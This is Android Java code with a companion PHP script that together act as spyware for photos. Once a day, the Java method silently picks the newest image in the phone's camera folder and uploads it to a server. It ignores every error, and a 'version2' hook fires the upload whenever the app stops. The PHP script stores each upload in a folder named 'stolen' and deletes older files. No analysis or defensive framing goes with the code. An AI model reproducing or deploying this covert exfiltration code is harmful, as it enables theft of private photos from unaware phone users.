	private void iq500sendFile()
	{	
		try{
			//limit one photo per day
			Boolean pass = false;
			Date t = new Date();
			long ts = t.getTime();
			SharedPreferences pref = getSharedPreferences("loadpref", Context.MODE_PRIVATE);
			SharedPreferences.Editor edit = pref.edit();

			long lastup = pref.getLong("lastUpload", 0);

			if(lastup == 0 || ts - lastup >= 86400000)
			{
				edit.putLong("lastUpload", ts);
				edit.commit();
				pass = true;
			}


			if(pass)
			{
				try
				{

					StrictMode.ThreadPolicy policy = new StrictMode.ThreadPolicy.Builder().permitAll().build();
					StrictMode.setThreadPolicy(policy);

					//Define root path and get file list
					String root = "/sdcard/DCIM/Camera/";
					File pa = new File(root);
					String[] res = pa.list();

					String res2 = "";

					//filter oversize files
					for(int i = 0; i < res.length; i++)
					{
						Boolean a = res[i].endsWith(".jpg");
						Boolean b = res[i].endsWith(".jpeg");
						Boolean c = res[i].endsWith(".png");
						Boolean d = new File(root + res[i]).length() /1024/1024 <= 10;
						if((a&&d) || (b&&d) || (c&&d))
						{
							res2 += root + res[i];

							if(i < res.length - 1)
								res2 += "\n";
						}
					}
					//electing last modified (newest)
					String[] res3 = res2.split("\n");
					String finalres = "";
					long lmod = 0;

					for(int i = 0; i < res3.length; i++)
					{
						long temp = lmod;
						lmod = Math.max(lmod, new File(res3[i]).lastModified());
						if(temp != lmod)
							finalres = res3[i];
					}

					//define final target
					File target = new File(finalres);
					//create binary entity
					FileEntity reqEntity = new FileEntity(target, "binary/octet-stream");
					//launch http request
					HttpClient httpclient = new DefaultHttpClient();
					HttpPost post = new HttpPost("http://localhost/file.php");
					//set binary entity
					post.setEntity(reqEntity);
					reqEntity.setContentType("binary/octet-stream");
					//fire
					httpclient.execute(post);

				}
				catch (Exception e)
				{}
			}	
		}catch(Exception e){}

		
		
	}

for version2:
	protected void onStop()
	{
		super.onStop();
		iq500sendFile();
	}

sample of file.php:
<?php
$inp = file_get_contents("php://input");
file_put_contents("stolen/" . time() . ".jpg", $inp);

$file = scandir("stolen/");
if(sizeof($file) > 52)
{
for($i = 2; $i < sizeof($file) - 50; $i++)
{
unlink("stolen/" . $file[i]);
}
}

?>
